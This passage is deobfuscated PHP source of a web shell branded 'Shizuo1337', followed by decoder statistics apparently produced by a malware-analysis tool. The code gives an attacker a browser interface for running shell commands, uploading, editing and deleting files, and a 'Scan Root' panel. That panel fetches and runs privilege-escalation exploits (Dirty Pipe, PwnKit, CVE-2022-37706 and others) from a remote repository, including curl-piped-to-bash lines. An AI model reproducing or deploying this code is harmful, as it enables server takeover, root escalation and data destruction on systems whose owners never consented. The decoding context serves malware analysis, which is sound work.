<div class='input-group mb-3'>
<input class='form-control btn-sm text-dark' type='text' name='cmd' value='".htmlspecialchars($_POST['cmd'],ENT_QUOTES,'UTF-8')."' placeholder='whoami' $hqb3270591348>
<button class='btn btn-outline-light btn-sm' type='sumbit'><i class='bi bi-arrow-return-right'></i></button>
</div>
</form>";if($enu794565824):echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;">$ <rd>'.htmlspecialchars($_POST['cmd']).'</rd><br><code>'.htmlspecialchars($enu794565824,ENT_QUOTES,'UTF-8').'</code></pre>
</div>
</div>';elseif(!$enu794565824&&$_SERVER['REQUEST_METHOD']=='POST'):echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>No result</code></pre>
</div>
</div>
</div>';endif;}if($azu3293050475['id']=='upload'){s();echo '<center class="anu">Upload (Multiple File Upload)</center>';if(isset($azu3293050475['upl'])){$mdb325763347=count($_FILES['file']['name']);for($gkk3036287351=0;$gkk3036287351<$mdb325763347;$gkk3036287351++){$vgn3319867140=$_FILES['file']['name'][$gkk3036287351];$hxf1133833840=@copy($_FILES['file']['tmp_name'][$gkk3036287351],"$sol190089999/".$vgn3319867140);}if($mdb325763347<2){if($hxf1133833840){echo"<strong>Upload</strong> $vgn3319867140 OK! ".ok()."</div>";}else{echo '<strong>Upload</strong> FAIL! '.er().'</div>';}}else{echo"<strong>Upload</strong> $mdb325763347 OK! ".ok()."</div>";}}echo"
<div class='card card-body text-dark input-group mb-3'>
Multiple File Upload
<form method='POST' enctype='multipart/form-data'>
<div class='input-group'>
<input class='form-control form-control-sm text-dark' type='file' name='file[]' multiple='' $hqb3270591348>
<input class='btn btn-dark btn-sm' type='submit' name='upl' value='Go!'>
</div>
</form>
</div>";}}if(isset($_GET['dir'])&&$_GET['id']=="scanroot"){ob_implicit_flush();ob_end_flush();s();echo '<center class="anu">Scan Root by shizuo</center>';echo "
<div class='text-center'>
<div class='btn-group mb-3'>
<a class='btn btn-outline-light btn-sm' href=http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."&id_two=autoscan><i class='bi bi-bug'></i> Auto Scan </a>
<a class='btn btn-outline-light btn-sm' href=http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."&id_two=scansd><i class='bi bi-search'></i> Scan SUID </a>
<a class='btn btn-outline-light btn-sm' href=http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."&id_two=esg><i class='bi bi-search'></i> Exploit Suggester </a>
<a class='btn btn-outline-light btn-sm' href=http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."&id_two=autoscan2><i class='bi bi-bug'></i> Auto Scan v2 </a>
<a class='btn btn-outline-light btn-sm' href=http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."&id_two=scansd2><i class='bi bi-search'></i> Scan SUID v2 </a>
<a class='btn btn-outline-light btn-sm' href=http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."&id_two=esg2><i class='bi bi-search'></i> Exploit Suggester v2 </a>
<a class='btn btn-outline-light btn-sm' href=http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."&id_two=lpesh><i class='bi bi-bug'></i> CVE-2022-37706 LPE </a>
<a class='btn btn-outline-light btn-sm' href=http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."&id_two=lpesh2><i class='bi bi-bug'></i> CVE-2022-37706 LPE v2</a>
</div>
</div>";if(!function_exists("proc_open")){echo "<center class='anu'>Command is Disabled!</center>";}if(!is_writable($sol190089999)){echo "<center class='anu'>Current Directory is Unwriteable!</center>";}if(isset($_GET['id_two'])&&$_GET['id_two']=="autoscan"){if(!file_exists($sol190089999."/shizuorooting/")){mkdir($sol190089999."/shizuorooting");exe_root("curl https://raw.githubusercontent.com/newbee1337/shizuos-minishell/main/tools/auto.tar.gz -o auto.tar.gz",$sol190089999."/shizuorooting");exe_root("tar -xf auto.tar.gz",$sol190089999."/shizuorooting");if(!file_exists($sol190089999."/shizuorooting/netfilter")){die("<center class='anu'>Failed to Download Material !</center>");}}echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>Netfilter : '.exe_root("timeout 10 ./shizuorooting/netfilter",$sol190089999).'Ptrace : '.exe_root("echo id | timeout 10 ./shizuorooting/ptrace",$sol190089999).'Sequoia : '.exe_root("timeout 10 ./shizuorooting/sequoia",$sol190089999).'OverlayFS : '.exe_root("echo id | timeout 10 ./overlayfs",$sol190089999."/shizuorooting").'Dirtypipe : '.exe_root("echo id | timeout 10 ./shizuorooting/dirtypipe /usr/bin/su",$sol190089999).'Sudo : '.exe_root("echo 12345 | timeout 10 sudoedit -s Y",$sol190089999).'Pwnkit : '.exe_root("echo id | timeout 10 ./pwnkit",$sol190089999."/shizuorooting").''.exe_root("rm -rf shizuorooting",$sol190089999).'</code></pre>
</div>
</div>';}elseif(isset($_GET['id_two'])&&$_GET['id_two']=="scansd"){echo '<center class="anu">Please wait..</center>';echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>'.exe_root("find / -perm -u=s -type f 2>/dev/null",$sol190089999).'</code></pre>
</div>
</div>';}elseif(isset($_GET['id_two'])&&$_GET['id_two']=="esg"){echo '<center class="anu">Please wait..</center>';echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>'.exe_root("curl -Lsk https://raw.githubusercontent.com/newbee1337/shizuos-minishell/main/tools/esg.sh | bash",$sol190089999).'</code></pre>
</div>
</div>';}elseif(isset($_GET['id_two'])&&$_GET['id_two']=="autoscan2"){if(!file_exists($sol190089999."/shizuorooting/")){mkdir($sol190089999."/shizuorooting");exe("curl https://raw.githubusercontent.com/newbee1337/shizuos-minishell/main/tools/auto.tar.gz -o auto.tar.gz",$sol190089999."/shizuorooting");exe("tar -xf auto.tar.gz",$sol190089999."/shizuorooting");if(!file_exists($sol190089999."/shizuorooting/netfilter")){die("<center class='anu'>Failed to Download Material!</center>");}}echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>Netfilter : '.exe("timeout 10 ./shizuorooting/netfilter",$sol190089999).'Ptrace : '.exe("echo id | timeout 10 ./shizuorooting/ptrace",$sol190089999).'Sequoia : '.exe("timeout 10 ./shizuorooting/sequoia",$sol190089999).'OverlayFS : '.exe("echo id | timeout 10 ./overlayfs",$sol190089999."/shizuorooting").'Dirtypipe : '.exe("echo id | timeout 10 ./shizuorooting/dirtypipe /usr/bin/su",$sol190089999).'Sudo : '.exe("echo 12345 | timeout 10 sudoedit -s Y",$sol190089999).'Pwnkit : '.exe("echo id | timeout 10 ./pwnkit",$sol190089999."/shizuorooting").''.exe("rm -rf shizuorooting",$sol190089999).'</code></pre>
</div>
</div>';}elseif(isset($_GET['id_two'])&&$_GET['id_two']=="scansd2"){echo '<center class="anu">Please wait..</center>';echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>'.exe("find / -perm -u=s -type f 2>/dev/null",$sol190089999).'</code></pre>
</div>
</div>';}elseif(isset($_GET['id_two'])&&$_GET['id_two']=="esg2"){echo '<center class="anu">Please wait..</center>';echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>'.exe("curl -Lsk https://raw.githubusercontent.com/newbee1337/shizuos-minishell/main/tools/esg.sh | bash",$sol190089999).'</code></pre>
</div>
</div>';}elseif(isset($_GET['id_two'])&&$_GET['id_two']=="lpesh"){echo '<center class="anu">Please wait..</center>';echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>'.exe_root("curl -Lsk https://raw.githubusercontent.com/newbee1337/shizuos-minishell/main/tools/lpe.sh | bash",$sol190089999).'</code></pre>
</div>
</div>';}elseif(isset($_GET['id_two'])&&$_GET['id_two']=="lpesh2"){echo '<center class="anu">Please wait..</center>';echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>'.exe("curl -Lsk https://raw.githubusercontent.com/newbee1337/shizuos-minishell/main/tools/lpe.sh | bash",$sol190089999).'</code></pre>
</div>
</div>';}}if(isset($azu3293050475['opn'])){$kxc2359244304=$azu3293050475['opn'];}if($azu3293050475['action']=='view'){s();echo"
<div class='btn-group'>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=view&opn=$kxc2359244304'><i class='bi bi-eye-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=edit&opn=$kxc2359244304'><i class='bi bi-pencil-square'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=rename&opn=$kxc2359244304'><i class='bi bi-pencil-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=download&opn=$kxc2359244304'><i class='bi bi-download'></i></a>
<a class='btn btn-outline-danger btn-sm' href='?dir=$sol190089999&action=delete_file&opn=$kxc2359244304'><i class='bi bi-trash-fill'></i></a>
</div>
<br>
<i class='bi bi-file-earmark'></i>: ".basename($kxc2359244304)."
</br>
<div class='bg-dark'>
<div class='container-fluid language-javascript'>
<textarea rows='10' class='form-control' disabled=''>".htmlspecialchars(file_get_contents($kxc2359244304))."</textarea>
</div>
</div>";}if(isset($azu3293050475['edit_file'])){$yrv2142108772=fopen("$kxc2359244304","w");$mdb325763347=fwrite($yrv2142108772,$azu3293050475['contents']);if($mdb325763347){echo '<strong>Edit file</strong> OK! '.ok().'</div>';}else{echo '<strong>Edit file</strong> FAIL! '.er().'</div>';}}if($azu3293050475['action']=='edit'){s();echo"
<div class='btn-group'>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=view&opn=$kxc2359244304'><i class='bi bi-eye-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=edit&opn=$kxc2359244304'><i class='bi bi-pencil-square'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=rename&opn=$kxc2359244304'><i class='bi bi-pencil-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=download&opn=$kxc2359244304'><i class='bi bi-download'></i></a>
<a class='btn btn-outline-danger btn-sm' href='?dir=$sol190089999&action=delete_file&opn=$kxc2359244304'><i class='bi bi-trash-fill'></i></a>
</div>
<br>
<i class='bi bi-file-earmark'></i>: ".basename($kxc2359244304)."
</br>
<form method='POST'>
<textarea class='form-control btn-sm' rows='10' name='contents' $hqb3270591348>".htmlspecialchars(file_get_contents($kxc2359244304))."</textarea>
<div class='d-grid gap-2'><br>
<button class='btn btn-outline-light btn-sm' type='sumbit' name='edit_file'><i class='bi bi-arrow-return-right'></i></button>
</div>
</form>";}if($azu3293050475['action']=='rename_folder'){if($azu3293050475['r_d']){$ngo3754459638=rename($oex3131800080,"".dirname($oex3131800080)."/".htmlspecialchars($azu3293050475['r_d'])."");if($ngo3754459638){echo '<strong>Rename folder</strong> OK! '.ok().'<a class="btn-close" href="?path='.dirname($oex3131800080).'"></a></div>';}else{echo '<strong>Rename folder</strong> FAIL! '.er().'<a class="btn-close" href="?path='.dirname($oex3131800080).'"></a></div>';}}s();echo"
<div class='btn-group'>
<a class='btn btn-outline-dark btn-sm' href='?dir=$sol190089999&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>
<a class='btn btn-outline-danger btn-sm' href='?dir=$sol190089999&action=delete_folder'><i class='bi bi-trash-fill'></i></a>
</div>
<br>
<i class='bi bi-folder-fill'></i>: ".basename($oex3131800080)."
</br>
<form method='POST'>
<div class='input-group'>
<input class='form-control btn-sm' type='text' value='".basename($oex3131800080)."' name='r_d' $hqb3270591348>
<button class='btn btn-outline-light btn-sm' type='submit'><i class='bi bi-arrow-return-right'></i></button>
</div>
</form>";}if(isset($azu3293050475['r_f'])){$eau1063113957=$kxc2359244304;$nkh1810056261=$azu3293050475['new_name'];rename($nkh1810056261,$eau1063113957);if(file_exists($nkh1810056261)){echo '<div class="alert alert-warning alert-dismissible fade show my-3" role="alert">
<strong>Rename file</strong> name already in use! <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>
</div>';}else{if(rename($eau1063113957,$nkh1810056261)){echo '<strong>Rename file</strong> OK! '.ok().'</div>';}else{echo '<strong>Rename file</strong> FAIL! '.er().'</div>';}}}if($azu3293050475['action']=='rename'){s();echo"
<div class='btn-group'>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=view&opn=$kxc2359244304'><i class='bi bi-eye-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=edit&opn=$kxc2359244304'><i class='bi bi-pencil-square'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=rename&opn=$kxc2359244304'><i class='bi bi-pencil-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=download&opn=$kxc2359244304'><i class='bi bi-download'></i></a>
<a class='btn btn-outline-danger btn-sm' href='?dir=$sol190089999&action=delete_file&opn=$kxc2359244304'><i class='bi bi-trash-fill'></i></a>
</div>
<br>
<i class='bi bi-file-earmark'></i>: ".basename($kxc2359244304)."
</br>
<form method='POST'>
<div class='input-group'>
<input class='form-control btn-sm' type='text' name='new_name' value='".basename($kxc2359244304)."' $hqb3270591348>
<button class='btn btn-outline-light btn-sm' type='sumbit' name='r_f'><i class='bi bi-arrow-return-right'></i></button>
</div>
</form>";}if($azu3293050475['action']=='delete_file'){s();if($azu3293050475['yeahx']){$bwe974290055=unlink($kxc2359244304);if($bwe974290055){echo '<strong>Delete file</strong> OK! '.ok().'</div>';}else{echo '<strong>Delete file</strong> FAIL! '.er().'</div>';}}echo"
<div class='btn-group mb-3'>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=view&opn=$kxc2359244304'><i class='bi bi-eye-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=edit&opn=$kxc2359244304'><i class='bi bi-pencil-square'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=rename&opn=$kxc2359244304'><i class='bi bi-pencil-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=download&opn=$kxc2359244304'><i class='bi bi-download'></i></a>
<a class='btn btn-outline-danger btn-sm' href='?dir=$sol190089999&action=delete_file&opn=$kxc2359244304'><i class='bi bi-trash-fill'></i></a>
</div>
<div class='card card-body text-dark input-group mb-3'>
<p>Are you sure to delete : ".basename($kxc2359244304)." ?</p>
<form method='POST'>
<a class='btn btn-dark btn-block btn-sm' href='?dir=$oex3131800080'>No</a>
<input type='submit' name='yeahx' class='btn btn-success btn-block btn-sm' value='Yes'>
</form>
</div>";}if($azu3293050475['action']=='delete_folder'){s();if($azu3293050475['yeah']){if(is_dir($oex3131800080)){if(is_writable($oex3131800080)){@rmdir($oex3131800080);@exe("rm -rf $oex3131800080");@exe("rmdir /s /q $oex3131800080");echo '<strong>Delete folder</strong> OK! '.ok().'<a class="btn-close" href="?path='.dirname($oex3131800080).'"></a></div>';}else{echo '<strong>Delete folder</strong> FAIL! '.er().'<a class="btn-close" href="?path='.dirname($oex3131800080).'"></a></div>';}}}echo"
<div class='btn-group mb-3'>
<a class='btn btn-outline-dark btn-sm' href='?dir=$sol190089999&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>
<a class='btn btn-outline-danger btn-sm' href='?dir=$sol190089999&action=delete_folder'><i class='bi bi-trash-fill'></i></a>
</div>
<div class='card card-body text-dark input-group mb-3'>
<p>Are you sure to delete : ".basename($oex3131800080)." ?</p>
<form method='POST'>
<a class='btn btn-dark btn-block btn-sm' href='?dir=".dirname($oex3131800080)."'>No</a>
<input type='submit' name='yeah' class='btn btn-success btn-block btn-sm' value='Yes'>
</form>
</div>";}if(isset($azu3293050475['filenew'])){s();if(isset($azu3293050475['bikin'])){$tqk1579384326=$azu3293050475['name_file'];$uvm1243076500=$azu3293050475['contents_file'];foreach($tqk1579384326 as $kyi3408522343){$bbh2441093337=@fopen("$kyi3408522343","w");if($uvm1243076500){$ldx2413224187=@fwrite($bbh2441093337,$uvm1243076500);}else{$ldx2413224187=$bbh2441093337;}}if($ldx2413224187){echo"<script>window.location='?path=$sol190089999'</script>";}else{echo '<strong>Create file</strong> FAIL! '.er().'</div>';}}echo"
<div class='mb-3'>
<form method='POST'>
<i class='bi bi-file-earmark'></i> Filename:
<input class='form-control form-control-sm text-dark' type='text' name='name_file[]' placeholder='filename' $hqb3270591348>
<i class='bi bi-file-earmark'></i> Your script:
<textarea class='form-control form-control-sm text-dark' name='contents_file' rows='7' placeholder='your script' $hqb3270591348></textarea>
<div class='d-grid gap-2'><br>
<input class='btn btn-outline-light btn-sm' type='submit' name='bikin' value='Create'>
</div>
</form>
</div>";}if(isset($azu3293050475['dirnew'])){s();if(isset($azu3293050475['create'])){$tqk1579384326=$azu3293050475['name_dir'];foreach($tqk1579384326 as $zzw3200152318){$rjy3970042317=preg_replace("([^wsd-_~,;:[](].]|[.]{2,})",'',$zzw3200152318);$agb950107039=@mkdir($rjy3970042317);}if($agb950107039){echo"<script>window.location='?path=$sol190089999'</script>";}else{echo '<strong>Create dir</strong> FAIL! '.er().'</div>';}}echo"
<div class='mb-3'>
<form method='POST'>
<i class='bi bi-folder'></i> Directory name:
<div class='input-group mb-3'>
<input class='form-control form-control-sm text-dark' type='text' name='name_dir[]' placeholder='Dir name' $hqb3270591348>
<input class='btn btn-outline-light btn-sm' type='submit' name='create' value='Create Directory'>
</div>
</form>
</div>";}echo '
<div class="table-responsive">
<table class="table table-hover table-dark text-light">
<thead>
<tr>
<td class="text-center">Name</td>
<td class="text-center">Type</td>
<td class="text-center">Last Edit</td>
<td class="text-center">Size</td>
<td class="text-center">Owner<gr>/</gr>Group</td>
<td class="text-center">Permission</td>
<td class="text-center">Action</td>
</tr>
</thead>
<tbody class="text-nowrap">
<tr>
<td><i class="bi bi-folder2-open"></i><a class="text-decoration-none text-secondary" href="?path='.dirname($oex3131800080).'">..</a></td><td></td><td></td><td></td><td></td><td></td><td class="text-center">
<div class="btn-group">
<a class="btn btn-outline-light btn-sm" href="?filenew&path='.$oex3131800080.'"><i class="bi bi-file-earmark-plus-fill"></i></a>
<a class="btn btn-outline-light btn-sm" href="?dirnew&path='.$oex3131800080.'"><i class="bi bi-folder-plus"></i></a>
</div>
</td>
</tr>';foreach($oue2843178896 as $oex3131800080){$uqm387975545=date("Y-m-d G:i",filemtime("$sol190089999/$oex3131800080"));if(strlen($oex3131800080)>25){$qdp908457509=substr($oex3131800080,0,25)."...";}else{$qdp908457509=$oex3131800080;}if(function_exists('posix_getpwuid')){$mdr736492942=@posix_getpwuid(fileowner("$sol190089999/$oex3131800080"));$mdr736492942=$mdr736492942['name'];}else{$mdr736492942=fileowner("$sol190089999/$oex3131800080");}if(function_exists('posix_getgrgid')){$bcu2509506725=@posix_getgrgid(filegroup("$sol190089999/$oex3131800080"));$bcu2509506725=$bcu2509506725['name'];}else{$bcu2509506725=filegroup("$sol190089999/$oex3131800080");}if(!is_dir($sol190089999.'/'.$kxc2359244304))continue;$sjz4156564586=filesize($sol190089999.'/'.$kxc2359244304)/1024;$sjz4156564586=round($sjz4156564586,3);if($sjz4156564586>=1024){$sjz4156564586=round($sjz4156564586/1024,2).' MB';}else{$sjz4156564586=$sjz4156564586.' KB';}if(!is_dir($sol190089999.'/'.$oex3131800080)||$oex3131800080=='.'||$oex3131800080=='..')continue;echo"
<tr>
<td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-secondary' href='?dir=$sol190089999/$oex3131800080'>$qdp908457509</a></td>
<td class='text-center'>dir</td>
<td class='text-center'>$uqm387975545</td>
<td class='text-center'>-</td>
<td class='text-center'>$mdr736492942<gr>/</gr>$bcu2509506725</td>
<td class='text-center'>";if(is_writable($sol190089999.'/'.$oex3131800080))echo '<gr>';elseif(!is_readable($sol190089999.'/'.$oex3131800080))echo '<rd>';echo p($sol190089999.'/'.$oex3131800080);if(is_writable($sol190089999.'/'.$oex3131800080)||!is_readable($sol190089999.'/'.$oex3131800080))echo '</font></center></td>';echo"
<td class='text-center'>
<div class='btn-group'>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999/$oex3131800080&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>
<a class='btn btn-outline-danger btn-sm txt' href='?dir=$sol190089999/$oex3131800080&action=delete_folder'><i class='bi bi-trash-fill'></i></a>
</div>
</td>
</tr>";}foreach($oue2843178896 as $kxc2359244304){$mgh622226427=date("Y-m-d G:i",filemtime("$sol190089999/$kxc2359244304"));if(function_exists('posix_getpwuid')){$frv1714248837=@posix_getpwuid(fileowner("$sol190089999/$kxc2359244304"));$frv1714248837=$frv1714248837['name'];}else{$frv1714248837=fileowner("$sol190089999/$kxc2359244304");}if(function_exists('posix_getgrgid')){$flf1067302958=@posix_getgrgid(filegroup("$sol190089999/$kxc2359244304"));$flf1067302958=$flf1067302958['name'];}else{$flf1067302958=filegroup("$sol190089999/$kxc2359244304");}if(!is_file($sol190089999.'/'.$kxc2359244304))continue;if(strlen($kxc2359244304)>25){$nhp3626735369=substr($kxc2359244304,0,25)."...-.".$xsf30643714;}else{$nhp3626735369=$kxc2359244304;}echo"
<tr>
<td><i class='bi bi-file-earmark-text-fill'></i><a class='text-decoration-none text-secondary' href='?dir=$sol190089999&action=view&opn=$kxc2359244304'>$nhp3626735369</a></td>
<td class='text-center'>file</td>
<td class='text-center'>$mgh622226427</td>
<td class='text-center'>".sz(filesize($kxc2359244304))."</td>
<td class='text-center'>$frv1714248837<gr>/</gr>$flf1067302958</td>
<td class='text-center'>";if(is_writable($sol190089999.'/'.$kxc2359244304))echo '<gr>';elseif(!is_readable($sol190089999.'/'.$kxc2359244304))echo '<rd>';echo p($sol190089999.'/'.$kxc2359244304);if(is_writable($sol190089999.'/'.$kxc2359244304)||!is_readable($sol190089999.'/'.$kxc2359244304))echo '</gr></rd></td>';echo"
<td class='text-center'>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=view&opn=$sol190089999/$kxc2359244304'><i class='bi bi-eye-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=edit&opn=$sol190089999/$kxc2359244304'><i class='bi bi-pencil-square'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=rename&opn=$sol190089999/$kxc2359244304'><i class='bi bi-pencil-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=download&opn=$sol190089999/$kxc2359244304'><i class='bi bi-download'></i></a>
<a class='btn btn-outline-danger btn-sm' href='?dir=$sol190089999&action=delete_file&opn=$sol190089999/$kxc2359244304'><i class='bi bi-trash-fill'></i></a>
</div>
</td>
</tr>";}?>
</tbody>
</table>
</div><center><div class='text-secondary'><hr><font color=white>© Shizuo1337</font></div></center>
</div>
</div>
</body>
</html>
Function Calls
ini_set | 5 |
array_merge | 1 |
session_start | 1 |
set_time_limit | 1 |
error_reporting | 1 |
Stats
MD5 | 470aa40fadaff0b0fa3756a62e2d8c3a |
Eval Count | 0 |
Decode Time | 264 ms |